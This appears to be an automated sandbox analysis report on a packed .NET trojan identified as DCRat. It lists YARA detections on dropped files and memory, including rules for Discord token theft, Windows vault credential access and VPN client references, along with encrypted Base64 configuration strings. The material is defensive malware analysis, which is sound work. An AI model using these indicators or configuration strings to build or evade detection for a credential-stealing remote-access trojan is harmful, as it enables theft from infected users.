Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005938092.0000000012919000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWinDefend.exe4 vs SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Binary or memory string: OriginalFilenameTESTING.exe4 vs SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Uses 32bit PE files

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 20.2.Loader.exe.1d000000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 2.0.Client.exe.350000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 2.2.Client.exe.26a68b0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 20.2.Loader.exe.1d000000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 20.2.Loader.exe.1dc20000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 20.2.Loader.exe.1dc20000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 21.2.Loaader.exe.1d630000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 21.2.Loaader.exe.1d630000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 21.2.Loaader.exe.1d630000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 21.2.Loaader.exe.1d630000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 20.2.Loader.exe.1dc20000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 20.2.Loader.exe.1dc20000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 20.2.Loader.exe.1d160000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 2.2.Client.exe.26a68b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 20.2.Loader.exe.1d160000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000014.00000002.2864018440.000000001DC20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000014.00000002.2864018440.000000001DC20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 00000014.00000002.2814130598.000000001D000000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000003.00000002.2032453597.0000000002301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000012.00000002.2097619560.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3282228143.000000000313B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3282228143.0000000003126000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3394522285.000000001332A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000003.00000002.2031490283.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 00000015.00000002.3248245047.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3532252741.000000001BC21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3282228143.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000015.00000002.3532252741.000000001BBB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000012.00000002.2087235357.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3282228143.00000000030CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: Process Memory Space: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe PID: 6176, type: MEMORYSTR	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: Process Memory Space: Loaader.exe PID: 7280, type: MEMORYSTR	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: C:\Users\user\AppData\Local\Temp\Client.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: C:\Users\user\AppData\Roaming\Loader.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: WinDefend.exe.0.dr

Static PE information: Section: %q2hF6 ZLIB complexity 1.0006310096153845

Source: Client.exe.0.dr, Settings.cs	Base64 encoded string: 'wWFEfQ+c90ezzgzVIAh2gn+ioxYAJrGRMTFIxsXSw2YlYKJtM/w/sAkG4PPuKX68Q8Bhjb4R/TNUX88Q9SgO8A==', 'wzI1GS7Qfvo4LsaJi0uqhPvW3er4Q7/n8ss6PONCBS8DzdTXs13MEbSRSJgnXTKJ4iTd++8X/kvaEYndCP/aDA==', 'l6B7hF2xdr1rH7SsDfVoi7MFx7QNmsw3TCZcmQB+isQN4elZF1M0hAmMAEoIFa4cVajo68VCOJDHOBuppuCyyju1WyPfhgBKzN8SLrU61qzZtpILUoxyezPnWbOHqAtV', 'xO7d3fFj6FvLvDIgm7WHEh/cBt3+RxVRoytmJT6p5KptN8hzxoanZtN93I5FqmoFNrney7rUvpRtihOgggLNyA==', 'YWe4qbKlktMVJTOSC4FHgRtIKybnn6IbXRRN5zHOBjqpjbHhP6byE4I7cOaJNeV2YrW/id6gcpYIA2F7eFYRnQ==', 'JvuASB2x4/fyHMUb4XE9373BC5dopAMLZ3bdc7gtg4SCpRBFCmaDPMfE1BHRn+hUN5PQZoiawxNfrQ6MtujUmw==', 'lRQuFjZWrbU8ySWxffDkTrJbvbtMVZ0jLwNEldEi6b5vcEh8/vpwV+vPSoldFWh1hw36BlmUTobTwCBA9G6sfQ==', 'H8k0G7kh/HyAier3JjeeSR0fGh1kIazZBzSNceaI9eCpL2P+V9gNvOj+mLpDbN1eVysH9MSWzLQvfl7VQsXJ1Q==', '/i9VjP44DZ8IjbUQs7c/s8zNlC2hodfvhh2g484pObRIbDikM3SLRxuwt+bMCoxpI4znrsy2cFl9DCBset+TYA==', 'RG/1sRlcEjovL7lahmfV9QwhvWPdPd7GrxPbIa7GYhwuhOm2SAwzCdubNWXRMUHFdIiCHNhnlJRTFVH/IEwCzQ=='
Source: Infected.exe.0.dr, Settings.cs	Base64 encoded string: 'ZSgE7xBGnq+Rt7cUMppN8rA3lH8urzGV2xb7eNCY96Hy1eiWKwwCc7En6gKxqxZ/2PkDlCnX9m2S1lo2xiiB6g==', 'SLrGHEx3OzR+wFRYezLxjUljxsc4JCYeMgZjMnZjnWqe5yx1MwWp01MrYXCUV8+VABeRjwIV74mDU8GclCJ8LA==', 'H5uq8K24WQ59RPaMzoegXPlkFXxNghMbLC8Hyg05hZVlNFM4uLjuYknP/um7OEMV55QkaojJL6HYQYLL/+I1jYGiSFSu3TDJfcKS/wVmsnAQ1vAr7+PHnmtVbTedumXM', '/SSxvI9cCc6gajROWy9NsKWIQlIBncsZdwSCF4aW+gBzj90gnkQo8LljeceOKSHWEmc06qdGCMakK6DB5rySj8cGrJucrDAa2A4EKwFx2j0YlvvtoynHU3WZE84DAdgYtP5hdwTDjZvdgKXmOC6G2gN/pUlG16WpLry/EWADwiWgbDN3d5QnJOhXNjWOx+6nZB/sjkfWoOdEc/j1Cz7ARl1/HWMK97KFiTW67F+7icKK7XHlVC3B0yPoQtoC1b0ulBF9atG/QaNxm4/eSD2N85idPvPZRrIgv+9U0oJ3ADBgJDgI38HRy05GnGrV5NWiTHVtHtng5i7UM0SOze4lCy8Qc8SRRhBTpK/8e47g2uUYOtKbTFeGGUxTQauXcHsWheDZLBk3ivWvHxuQ4JYko3NF1Wc0BVSQpyXmjISoUIkHtsc+svnXS21jmLzGz8UmLMdZrA4kyd50+1XbD5I5Mmy5eFhD2GZ/LCx47keVdZXOA5XdlSGX74PFBKjfV0n1GAKhe/PszCnOCjxC0nVYMVHnAqsE8XT/mjAAwRqJebVPkf/LnFfhvZ2ZGiERCo/U1K1YMteALei0Kmpv2eEgAA+d3/T/6zaxQtEH78x98MHsTBTlrkQRZgj8sqnTl6cEoozQ7IXBomY/876LBkIbgIkJci/FYiTiymGX5qWGUnPBZk18OczUY1jxjHWYSHgbsrEzia6Ww6Ptk0H8pdtD2aQHjFftLMctKhrMauNsX8Kqfcf6KOepoiWfncp5N7oayOXOcxNTAm13mVpR0LUCV2UEantbia5foH79neZA3hLdNk+nqNgn1KXLuxuTVpk1UQN4NWbLRVqzrTiUZj9wN9aXtEDbNqCR7esntSeitBzBgd0L9UXhsk0F61hMHtmA3OXIMqc4n1k/qU4KBPK8YR9a70aXgEV2oeMhOSoYc9yoJTO5Yups9zc8GNLPch7O+doky84atZ05JhnNwpK8YBZoigPbs2tebxyoPuJHePypknfZluW+/6JppQd5lw3nSlXMEviRfto87fflHQFXFtJycWjW+daOJbQHpQ/MNNU=', 'MFMO9tQliu2ahQNaZ3lj7Wf/gRk36qwiOhN2bk2r9goaPIxtvEC1o1xa9OhDCoZCCE/4+3A1er0RXTmjAePWUZiEf716i9ToUYcgyacKNHZnW66p21ybPOob2s2T/B1gnGskdlt5cJpc6jvkp3q/n4JFQRTAesGDRmYu0dyKQ5LPWtBPg/nwm1hQS4zNXK68XGecNV7+oUc6hCHcm2WHB7ixI6S1Rdj8u5c2qquIz9djUVRdGJiEPqnH7aX6ExUEzVhapRSsIue2nifvQ0IfxvlQk9hkzcOQYmbLNZ7EGhs=', 'KSdmB55BOL3ztYhJamMxsl1GB/4EE/vUpYhY8ypiFZ88HhGtjV8JxQYFgyoQ+n8XhN6YFeWOGjHJN5CNponl9g==', 'jVed3LTMOC3Ruh7bMj8e1GRGwkKnPN3oTffGuEc34JGyNAsR2jJEVdUWw0Ib75wbyjKbEVcT+9D1G6Hr50kvyw==', 'pZ/npkec7blOVsRumN94nR0rBZcTDW4ACRirZXscCY48dX8vq9vXv+CBelTsvniWcpE064spGtxGNvGpM7YwHg=='
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, Settings.cs	Base64 encoded string: 'wWFEfQ+c90ezzgzVIAh2gn+ioxYAJrGRMTFIxsXSw2YlYKJtM/w/sAkG4PPuKX68Q8Bhjb4R/TNUX88Q9SgO8A==', 'wzI1GS7Qfvo4LsaJi0uqhPvW3er4Q7/n8ss6PONCBS8DzdTXs13MEbSRSJgnXTKJ4iTd++8X/kvaEYndCP/aDA==', 'l6B7hF2xdr1rH7SsDfVoi7MFx7QNmsw3TCZcmQB+isQN4elZF1M0hAmMAEoIFa4cVajo68VCOJDHOBuppuCyyju1WyPfhgBKzN8SLrU61qzZtpILUoxyezPnWbOHqAtV', 'xO7d3fFj6FvLvDIgm7WHEh/cBt3+RxVRoytmJT6p5KptN8hzxoanZtN93I5FqmoFNrney7rUvpRtihOgggLNyA==', 'YWe4qbKlktMVJTOSC4FHgRtIKybnn6IbXRRN5zHOBjqpjbHhP6byE4I7cOaJNeV2YrW/id6gcpYIA2F7eFYRnQ==', 'JvuASB2x4/fyHMUb4XE9373BC5dopAMLZ3bdc7gtg4SCpRBFCmaDPMfE1BHRn+hUN5PQZoiawxNfrQ6MtujUmw==', 'lRQuFjZWrbU8ySWxffDkTrJbvbtMVZ0jLwNEldEi6b5vcEh8/vpwV+vPSoldFWh1hw36BlmUTobTwCBA9G6sfQ==', 'H8k0G7kh/HyAier3JjeeSR0fGh1kIazZBzSNceaI9eCpL2P+V9gNvOj+mLpDbN1eVysH9MSWzLQvfl7VQsXJ1Q==', '/i9VjP44DZ8IjbUQs7c/s8zNlC2hodfvhh2g484pObRIbDikM3SLRxuwt+bMCoxpI4znrsy2cFl9DCBset+TYA==', 'RG/1sRlcEjovL7lahmfV9QwhvWPdPd7GrxPbIa7GYhwuhOm2SAwzCdubNWXRMUHFdIiCHNhnlJRTFVH/IEwCzQ=='
